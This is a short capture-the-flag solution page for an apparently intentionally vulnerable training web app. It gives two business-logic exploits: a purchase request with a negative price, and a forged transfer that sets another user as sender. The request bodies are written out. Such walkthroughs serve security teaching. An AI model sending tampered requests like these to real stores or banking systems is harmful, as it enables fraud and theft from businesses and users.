Invalid Model

Challenge

#1: Buy product for another price

Buy a product from the store for another price that is listed.

Solution

Create a custom post request on /api/Store/BuyProduct with the following body.

{
	"id": 1,
	"quantity": 1,
	"price": -10
}

You will find the flag in the response header.

#2: Create a transaction for another user

Create a transaction for another user.

Solution

Create a post request to Transaction/Create with the following body. Don't forget about the RequestVerification token and cookie in your request.

SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:

You can find the flag in the response cookie.

PreviousChallengesNextInvalid Redirect

Last updated

Was this helpful?